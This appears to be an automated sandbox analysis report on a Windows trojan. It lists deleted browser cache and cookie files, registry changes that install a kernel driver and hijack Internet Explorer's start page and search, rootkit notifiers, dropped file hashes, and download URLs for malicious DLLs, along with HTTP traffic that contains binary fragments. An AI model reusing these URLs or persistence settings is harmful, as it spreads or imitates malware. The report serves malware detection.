C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A3D4372536C2A6CA26ECB4389B6AE73E3BED83A7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\3412 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c (0 bytes)

Registry activity

The process f23bb1c179d6ccab543d15af98e5eea.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://123.sogou.com/?71102-0043"
"Local Page" = "https://123.sogou.com/?71102-0043"

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"Devname" = "VtXt6rrWyWLÆ¢"
"ImagePath" = "\DosDevices\C:\Windows\system32\14532e\CDClient_EX.sys"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.sogou.com/sie?hdq=Af71102-0043&query={searchTerms}&ie=utf8"

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"ErrorControl" = "1"
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

Dropped PE files

MD5 File path
51138beea3e2c21ec44d0932c71762a8 c:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe
51138beea3e2c21ec44d0932c71762a8 c:\Users\All Users\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\wrhKvXr\lMmgfUJPh.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 299008 116736 5.54409 7447ec20e915aefa001b3ec035460570
DATA 303104 24576 14336 5.51482 6423434f61fc873a2fff37a155462ead
BSS 327680 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 331776 8192 2048 5.43092 b28b70ae8671a878ee755fe2a593517c
.tls 339968 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 344064 4096 512 0.143426 f2d16d514515f63a6ca5e54aa0f78065
.reloc 348160 24576 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 372736 16384 4608 5.08114 ce288fb53f0de086ebc788aba75545b0
.aspack 389120 8192 5632 4.13993 cb7160f308503f22361b3085c4c34e69
.adata 397312 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://udo.jxwan.com/index/getcfg?id=50043 119.97.143.59
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://dld.jxwan.com/d2/x86.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /index/getcfg?id=50043 HTTP/1.1
Host: udo.jxwan.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 
Server: nginx/1.8.1
Date: Wed, 24 May 2017 21:32:32 GMT
Transfer-Encoding: chunked
Connection: keep-alive
1fb7..............Y..8...[...g._4QB..s ..*.O6`.m...p5.K........%.I.,..
u.......(.11...?.......e.........:.._.......?.........?Ged....F.T@z...
.?.^vq=.QY.]......[.W...n.M...X>.....n...............~w=.w....n..c9
....]......._~u..<..<...g.............._._Y`..<..........b...
_-(._...6..o./...~....~vm....-...............|.._. p......w.w .._....Z
?.?...8.}........x...O.......A..~.m......2..../?.M./Y.c...}\..<..M.
L....0.2........Q...Y................h........l...].w..4...Vj........x
W..._.........*..V....4...g]tU8...X..J=....K..j...Oxy.5.oC#...z...2.9&
gt;.......uL.._.[.2\..i..a.....W..c,...*.M.5..p......w..~06...K..5.Mx.
4.o..8..vN.:..........~...o..........._....................(.uU(n..V&g
t;v).(....)..Q~......M.....;....}..N6.c.].<...-......N...]..wWfe.1.
... .UJ/1'.~..........7.........)T...9L*0NQ3Q....Qs..vQG..MFxP..Nd...V
lY.C.js...^..ip.....jcn..~p.]...o.~........S.%.A......_`.}..o..o..o..-
..}..._.._~..[........e...S....C _......2..W.....x62.......e..._\...S.
.[..[.|.n~..j...y[...~c....;..~.....?..5...B....e.....gQ...R.....k....
......i ..B-@;.....1.\..I...PU..........7...wY.......g.....Q..y~.57..l
....[*5e5<.*}d...w<..^L...!.....#.....s.|?<.....=f..=v.o;..e[
...:.m.9...ks...|.........2..70.t[...........fUv7.....l..1.n...@...BTt
..N.Sm.7.....J.B!.c.....L......yar.w.]vL.q.....<aXku.jQk..(X.z.1...
)...1.....B. ..Y..opl.]d..;..a.G...P2...0..).K.{....du...x...K.E.V....
].._.]...TbXw..8.E...j'..I.X.cb|=.U.x.*.`..."........9<...._...\ q.
u.bB....r..\.cN..X.....U ......)..W....I.F0..Gu..mk.o`..}l....b$[L
<<< skipped >>>


GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 10:18:42 GMT
Content-Length: 20806
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 23 May 2017 02:56:22 GMT
Accept-Ranges: bytes
ETag: "6af182970d3d21:16065"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 40452
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
. ..html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h
3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,t
h,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:
0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var
{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th
{text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{co
ntent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:
text-top}sub{vertical-align:text-bottom}input,textarea,select{font-fam
ily:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}lege
nd{color:#000}.....html{height:100%;}.....body{height: 100%;font-size:
 14px;}.....table{table-layout:fixed;border-collapse: collapse;border-
spacing: 0;margin: 0 auto;}.....input,button{font-family: Tahoma,Arial
, Helvetica,"Microsoft Yahei";}.....a{color: #1c5f82;text-decorati
<<< skipped >>>


GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:38:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQTTARBQ=IMKGFGECIMAHLDMJLNFLHPFC; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>..



HEAD /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:17:38 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/x86.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:17:38 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
